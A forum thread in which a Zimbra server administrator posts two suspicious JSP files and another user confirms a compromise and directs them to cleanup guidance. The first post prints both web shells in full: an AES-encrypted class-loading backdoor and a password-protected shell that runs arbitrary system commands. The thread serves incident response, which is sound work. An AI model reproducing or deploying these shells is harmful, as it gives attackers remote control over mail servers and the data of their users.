XZimbra.jsp and AJAX.jsp

[mqaroush]

Hello
Are these files are zimbra file or script created by hacker
/opt/zimbra/jetty/webapps/zimbra/js/zimbra/csfe/XZimbra.jsp and the content of it is:

Code: Select all

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("nmmwxkYBjkrOn47r0oaUOFg139-kaTSEj0EIePPK5wA")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(
pageContext);%>


/opt/zimbra/jetty/webapps/zimbra/public/Ajax.jsp and the content is :

Code: Select all

<%if("nmmwxkYBjkrOn47r0oaUOFg139-kaTSEj0EIePPK5wA".equals(request.getParameter("ppwd"))){java.io.InputStream in = Runtime.getRuntime().exec(new String[]{"/bin/sh","-c", request.getParameter("pcom")}).getInputStream();int a = -1;byte[] b = new byte[2048];out.print("<pre>");while((a=in.read(b))!=-1){out.println(new String(b));}out.print("</pre>");}%>



[mqaroush]

more about them

Code: Select all

 stat /opt/zimbra/jetty/webapps/zimbra/js/zimbra/csfe/XZimbra.jsp
  File: `/opt/zimbra/jetty/webapps/zimbra/js/zimbra/csfe/XZimbra.jsp'
  Size: 651             Blocks: 8          IO Block: 4096   regular file
Device: fd04h/64772d    Inode: 90579419    Links: 1
Access: (0640/-rw-r-----)  Uid: (  496/  zimbra)   Gid: (  493/  zimbra)
Access: 2019-05-13 10:32:06.979040738 +0300
Modify: 2019-05-06 08:45:01.300197279 +0300
Change: 2019-05-06 08:45:01.300197279 +0300
 

and

Code: Select all

 stat /opt/zimbra/jetty/webapps/zimbra/public/Ajax.jsp
  File: `/opt/zimbra/jetty/webapps/zimbra/public/Ajax.jsp'
  Size: 351             Blocks: 8          IO Block: 4096   regular file
Device: fd04h/64772d    Inode: 90579420    Links: 1
Access: (0640/-rw-r-----)  Uid: (  496/  zimbra)   Gid: (  493/  zimbra)
Access: 2019-05-14 10:31:38.332031927 +0300
Modify: 2019-05-08 09:59:27.755179196 +0300
Change: 2019-05-08 09:59:27.755179196 +0300
 

[Bittone]

Hello mqaroush,
bad news: you have been hacked.
good news: here you can find everything you need to clean up your server viewtopic.php?f=15&t=65932 .
Now as a best practice you should migrate all to a new VM/Server but in some cases that's not feasible so.. good luck.
Bye
A.T.

[mqaroush]

are they zimbra files and edited by hacker?? or new files created by Hackers??
Can i delete those file or not??

[Bittone]

Hello mquaroush,
unfortunately there is no easy answer since the hacking is more complex than just two files , so you MUST read all the thread in order to fully understand how far the hack went.
Deleting a couple of files is NOT the answer you are looking for since without other necessary actions it will leave your system open for future hacks.
So you must :
1) read the thread (and you will learn many things by doing so);
2) understand in what form your system was compromised;
3) fix and patch your system in order not to be a target any more.
Bye

A.T.